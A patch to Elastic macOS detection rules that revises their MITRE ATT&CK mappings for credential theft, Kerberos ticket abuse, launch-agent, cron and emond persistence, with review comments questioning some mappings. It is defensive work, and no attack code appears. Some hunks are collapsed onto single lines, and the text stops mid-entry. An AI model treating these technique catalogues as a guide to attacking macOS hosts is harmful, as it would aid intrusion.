 reference = "https://attack.mitre.org/techniques/T1566/001/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml
index 23775e46154..2050d05ec37 100644
--- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml
+++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/12"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -103,36 +103,79 @@ Kerberos is a network authentication protocol designed to provide secure identit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.002"
+name = "Pass the Hash"
+reference = "https://attack.mitre.org/techniques/T1550/002/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.003"
 name = "Pass the Ticket"
 reference = "https://attack.mitre.org/techniques/T1550/003/"
-
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
 [[rule.threat.technique]]
 id = "T1558"
 name = "Steal or Forge Kerberos Tickets"
 reference = "https://attack.mitre.org/techniques/T1558/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1558.003"
 name = "Kerberoasting"
 reference = "https://attack.mitre.org/techniques/T1558/003/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1558.005"
+name = "Ccache Files"
+reference = "https://attack.mitre.org/techniques/T1558/005/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.002"
+name = "Pass the Hash"
+reference = "https://attack.mitre.org/techniques/T1550/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.003"
+name = "Pass the Ticket"
+reference = "https://attack.mitre.org/techniques/T1550/003/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml
index 5d7922d88c6..f8bc0af0692 100644
--- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml
+++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -101,19 +101,31 @@ The `systemsetup` command in macOS is a utility that allows administrators to co
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1021.004"
 name = "SSH"
 reference = "https://attack.mitre.org/techniques/T1021/004/"
-
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml
index e96f7b9451c..24db77448d6 100644
--- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml
+++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml
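Review bot: `id = "T1552.001"` / `name = "Credentials In Files"` is added next to `T1558.005` (Ccache Files) on the Credential Access entry, but the ccache sub-technique already describes the on-disk material a Kerberos tool reads; unless the query above this hunk matches a credential-file read, the `T1552` / `T1552.001` tables are a stretch and I would drop both. The third `[[rule.threat]]` entry repeats the whole T1550 / T1550.002 / T1550.003 block under Defense Evasion; that is valid ATT&CK (T1550 is listed under both Defense Evasion and Lateral Movement), but the duplicated block is easy to mistake for a copy-paste error, so calling it out as intentional in the commit message would help the next reader.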
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/30"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -78,25 +78,45 @@ process where host.os.type == "macos" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Lateral Movement"
- id = "TA0008"
- reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat.technique]]
+id = "T1072"
+name = "Software Deployment Tools"
+reference = "https://attack.mitre.org/techniques/T1072/"
- [[rule.threat.technique]]
- name = "Software Deployment Tools"
- id = "T1072"
- reference = "https://attack.mitre.org/techniques/T1072/"
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- name = "Software Deployment Tools"
- id = "T1072"
- reference = "https://attack.mitre.org/techniques/T1072/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.002"
+name = "AppleScript"
+reference = "https://attack.mitre.org/techniques/T1059/002/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.007"
+name = "JavaScript"
+reference = "https://attack.mitre.org/techniques/T1059/007/"
+
+[[rule.threat.technique]]
+id = "T1072"
+name = "Software Deployment Tools"
+reference = "https://attack.mitre.org/techniques/T1072/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
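Review bot: The new Execution entry maps `T1059.002`, `T1059.006` and `T1059.007` (AppleScript, Python, JavaScript) onto a rule whose query, per the hunk header, is a `process where ... event.type == "start"` match on the curl invocation; the rule observes the HTTP request to the Jamf endpoint, not any interpreter a Jamf policy might later launch, so these sub-techniques describe a hypothesised next step rather than the detected behaviour. I would keep `T1072` (Software Deployment Tools) under Execution and drop the `T1059` table with its three sub-technique tables, unless the full query above this hunk also matches `osascript` / `python` children, in which case the rule description should say so. The reordered Lateral Movement entry is unchanged in substance.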
diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml
index 448fb9b9bff..c284bdb2415 100644
--- a/rules/macos/lateral_movement_vpn_connection_attempt.toml
+++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/25"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -105,14 +105,26 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml
index 8ffa3621827..aad29d1ee6c 100644
--- a/rules/macos/persistence_account_creation_hide_at_logon.toml
+++ b/rules/macos/persistence_account_creation_hide_at_logon.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -98,19 +98,46 @@ In macOS environments, the `dscl` command-line utility manages directory service
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.003"
 name = "Local Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/003/"
+[[rule.threat.technique]]
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
+[[rule.threat.technique.subtechnique]]
+id = "T1136.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1136/001/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1564"
+name = "Hide Artifacts"
+reference = "https://attack.mitre.org/techniques/T1564/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1564.002"
+name = "Hidden Users"
+reference = "https://attack.mitre.org/techniques/T1564/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml
index 4e7a49b2daa..5c61bee11fd 100644
--- a/rules/macos/persistence_apple_mail_rule_modification.toml
+++ b/rules/macos/persistence_apple_mail_rule_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -81,25 +81,38 @@ file where host.os.type == "macos" and event.type != "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Persistence"
- id = "TA0003"
- reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
- [[rule.threat.technique]]
- name = "Event Triggered Execution"
- id = "T1546"
- reference = "https://attack.mitre.org/techniques/T1546/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1647"
+name = "Plist File Modification"
+reference = "https://attack.mitre.org/techniques/T1647/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml
index 25970d8647b..b194c48c852 100644
--- a/rules/macos/persistence_creation_change_launch_agents_file.toml
+++ b/rules/macos/persistence_creation_change_launch_agents_file.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/04/21"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -100,19 +100,41 @@ Launch Agents in macOS are used to execute scripts or applications automatically
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.001"
 name = "Launch Agent"
 reference = "https://attack.mitre.org/techniques/T1543/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1543.004"
+name = "Launch Daemon"
+reference = "https://attack.mitre.org/techniques/T1543/004/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1569"
+name = "System Services"
+reference = "https://attack.mitre.org/techniques/T1569/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1569.001"
+name = "Launchctl"
+reference = "https://attack.mitre.org/techniques/T1569/001/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml
index 1dd6607c7eb..374da22f80c 100644
--- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml
+++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/01/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/03/18"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
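Review bot: `T1543.004` (Launch Daemon) and the new Execution entry `T1569.001` (Launchctl) are added to a rule that, per the hunk header, is about Launch Agents files; a file-creation rule does not observe `launchctl` running, and Launch Daemon plists live under `/Library/LaunchDaemons`, which the query above this hunk would have to include for that sub-technique to hold. If the query only covers `LaunchAgents` paths, drop the `T1543.004` table and the whole Execution `[[rule.threat]]` entry (T1569 / T1569.001) so the mapping stays tied to what is detected; if it was widened to LaunchDaemons, the rule name and description should say so. Also, the new `[[rule.threat.technique.subtechnique]]` table for T1543.004 has no blank line separating it from the preceding `reference` line, unlike the other tables in this hunk.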
@@ -97,43 +97,49 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.015" +name = "Login Items" +reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1647" name = "Plist File Modification" reference = "https://attack.mitre.org/techniques/T1647/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 15e61637816..2dc6bcf3a2c 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,19 +103,31 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/macos/persistence_crontab_creation.toml b/rules/macos/persistence_crontab_creation.toml index 0fd47fdaa86..3610bd457f7 100644 --- a/rules/macos/persistence_crontab_creation.toml +++ b/rules/macos/persistence_crontab_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,19 +100,36 @@ Cron is a time-based job scheduler in Unix-like operating systems, including mac [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 7be128e76cb..0d180ea6743 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,30 +81,48 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell Configuration Modification" - id = "T1546.004" - reference = "https://attack.mitre.org/techniques/T1546/004/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 1feff70a4d6..40c2556197f 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,36 +103,41 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_directory_services_plugins_modification.toml b/rules/macos/persistence_directory_services_plugins_modification.toml index 851527cc2f2..6a540301235 100644 
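Review bot: In the `@@ -103,36 +103,41 @@` hunk the added `[[rule.threat.technique.subtechnique]]` block for T1543.004 is inserted with no blank line separating it from the T1543.001 block above or the `[rule.threat.tactic]` table below, while every other table boundary in the same hunk gains a blank line. The same inconsistency appears in the hunks at L4136 and L4147 (T1543.004) and at L4157 and L4158 (the T1098 technique and its T1098.007 sub-technique). A blank line before `+[[rule.threat.technique.subtechnique]]` and before `[rule.threat.tactic]` would keep these files consistent with the other rules normalized in this patch.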
--- a/rules/macos/persistence_directory_services_plugins_modification.toml +++ b/rules/macos/persistence_directory_services_plugins_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,14 +98,18 @@ DirectoryService PlugIns on macOS are integral for managing directory-based serv [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 60cccae6d72..5e68169bfdf 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -102,14 +102,23 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_emond_rules_file_creation.toml b/rules/macos/persistence_emond_rules_file_creation.toml index aceae728df5..d163f01c87e 100644 --- a/rules/macos/persistence_emond_rules_file_creation.toml +++ b/rules/macos/persistence_emond_rules_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
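Review bot: The added `T1547.009` `Shortcut Modification` sub-technique is, as far as I recall, scoped to Windows shortcut files in ATT&CK, whereas this rule covers macOS Dock property-list changes, so the mapping may not pass a platform check. The parent `T1547` entry added in the same hunk, together with the existing `T1543`, already captures the autostart angle; confirm the sub-technique's current platform list before keeping `id = "T1547.009"`.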
@@ -99,19 +99,36 @@ The Event Monitor Daemon (emond) on macOS is a service that executes commands ba [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.014" name = "Emond" reference = "https://attack.mitre.org/techniques/T1546/014/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.014" +name = "Emond" +reference = "https://attack.mitre.org/techniques/T1546/014/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_emond_rules_process_execution.toml b/rules/macos/persistence_emond_rules_process_execution.toml index 4a0d2d1ddfe..d311934e05e 100644 --- a/rules/macos/persistence_emond_rules_process_execution.toml +++ b/rules/macos/persistence_emond_rules_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -125,19 +125,69 @@ The Event Monitor Daemon (emond) on macOS is a service that executes commands ba [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.014" name = "Emond" reference = "https://attack.mitre.org/techniques/T1546/014/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = 